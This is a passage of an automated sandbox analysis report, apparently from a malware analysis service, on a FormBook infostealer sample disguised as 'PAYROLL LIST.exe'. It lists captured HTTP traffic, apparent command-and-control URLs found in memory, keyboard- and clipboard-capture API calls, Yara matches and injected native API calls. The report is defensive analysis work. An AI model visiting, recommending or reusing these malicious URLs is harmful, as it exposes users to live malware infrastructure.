6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:31:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:31:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:31:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: waitfor.exe, 00000005.00000002.4587102048.0000000006126000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4589438733.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt
Source: XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000003DFE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.madhf.tech/3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/f
Source: XQNtOWkQlf.exe, 00000007.00000002.4587938098.00000000056E8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop
Source: XQNtOWkQlf.exe, 00000007.00000002.4587938098.00000000056E8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop/swhs/
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: waitfor.exe, 00000005.00000002.4587102048.00000000057BA000.00000004.10000000.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000003ADA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: waitfor.exe, 00000005.00000002.4573886481.0000000002A93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: waitfor.exe, 00000005.00000003.2590878373.00000000079DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: waitfor.exe, 00000005.00000002.4573886481.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: waitfor.exe, 00000005.00000002.4573886481.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: waitfor.exe, 00000005.00000002.4573886481.0000000002A93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: waitfor.exe, 00000005.00000002.4573886481.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: waitfor.exe, 00000005.00000002.4573886481.0000000002A93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.register.com/?trkID=WSTm3u15CW
Source: waitfor.exe, 00000005.00000002.4587102048.0000000006126000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4589438733.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.register.com/whois?domainName=jcsa.info
Source: waitfor.exe, 00000005.00000002.4587102048.000000000644A000.00000004.10000000.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.000000000476A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zkdamdjj.shop/swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A76B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00A76B0C

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A76D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A76D07

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

0_2_00A76B0C

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A62B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00A62B37

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A8F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00A8F7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4582414489.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4571302194.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407829653.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4584294088.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407461524.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581284077.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2408321100.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00A23D19
Source: PAYROLL LIST.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PAYROLL LIST.exe, 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_535a7e6c-2
Source: PAYROLL LIST.exe, 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_de8a3ac4-2
Source: PAYROLL LIST.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d821f9d6-5
Source: PAYROLL LIST.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_823a218f-8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CFC3 NtClose,	2_2_0042CFC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AE71 NtAllocateVirtualMemory,	2_2_0040AE71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B60 NtClose,LdrInitializeThunk,	2_2_03372B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03372DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03372C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,	2_2_033735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374340 NtSetContextThread,	2_2_03374340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374650 NtSuspendThread,	2_2_03374650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BA0 NtEnumerateValueKey,	2_2_03372BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B80 NtQueryInformationFile,	2_2_03372B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BF0 NtAllocateVirtualMemory,	2_2_03372BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BE0 NtQueryValueKey,	2_2_03372BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AB0 NtWaitForSingleObject,	2_2_03372AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AF0 NtWriteFile,	2_2_03372AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AD0 NtReadFile,	2_2_03372AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F30 NtCreateSection,	2_2_03372F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F60 NtCreateProcessEx,	2_2_03372F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FB0 NtResumeThread,	2_2_03372FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FA0 NtQuerySection,	2_2_03372FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F90 NtProtectVirtualMemory,	2_2_03372F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FE0 NtCreateFile,	2_2_03372FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E30 NtWriteVirtualMemory,	2_2_03372E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EA0 NtAdjustPrivilegesToken,	2_2_03372EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E80 NtReadVirtualMemory,	2_2_03372E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EE0 NtQueueApcThread,	2_2_03372EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D30 NtUnmapViewOfSection,	2_2_03372D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D10 NtMapViewOfSection,	2_2_03372D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D00 NtSetInformationFile,	2_2_03372D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DB0 NtEnumerateKey,	2_2_03372DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DD0 NtDelayExecution,	2_2_03372DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C00 NtQueryInformationProcess,	2_2_03372C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C60 NtCreateKey,	2_2_03372C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CA0 NtQueryInformationToken,	2_2_03372CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CF0 NtOpenProcess,	2_2_03372CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CC0 NtQueryVirtualMemory,	2_2_03372CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373010 NtOpenDirectoryObject,	2_2_03373010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373090 NtSetValueKey,	2_2_03373090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033739B0 NtGetContextThread,	2_2_033739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D10 NtOpenProcessToken,	2_2_03373D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D70 NtOpenThread,	2_2_03373D70
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04964650 NtSuspendThread,LdrInitializeThunk,	5_2_04964650
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04964340 NtSetContextThread,LdrInitializeThunk,	5_2_04964340
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04962CA0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04962C70
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962C60 NtCreateKey,LdrInitializeThunk,	5_2_04962C60
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962DD0 NtDelayExecution,LdrInitializeThunk,	5_2_04962DD0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04962DF0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_04962D10
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_04962D30
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_04962E80
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_04962EE0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962FB0 NtResumeThread,LdrInitializeThunk,	5_2_04962FB0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962FE0 NtCreateFile,LdrInitializeThunk,	5_2_04962FE0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962F30 NtCreateSection,LdrInitializeThunk,	5_2_04962F30
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962AD0 NtReadFile,LdrInitializeThunk,	5_2_04962AD0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962AF0 NtWriteFile,LdrInitializeThunk,	5_2_04962AF0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_04962BA0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04962BF0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_04962BE0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962B60 NtClose,LdrInitializeThunk,	5_2_04962B60
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049635C0 NtCreateMutant,LdrInitializeThunk,	5_2_049635C0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049639B0 NtGetContextThread,LdrInitializeThunk,	5_2_049639B0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962CC0 NtQueryVirtualMemory,	5_2_04962CC0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962CF0 NtOpenProcess,	5_2_04962CF0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962C00 NtQueryInformationProcess,	5_2_04962C00
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962DB0 NtEnumerateKey,	5_2_04962DB0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962D00 NtSetInformationFile,	5_2_04962D00
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962EA0 NtAdjustPrivilegesToken,	5_2_04962EA0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962E30 NtWriteVirtualMemory,	5_2_04962E30
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962F90 NtProtectVirtualMemory,	5_2_04962F90
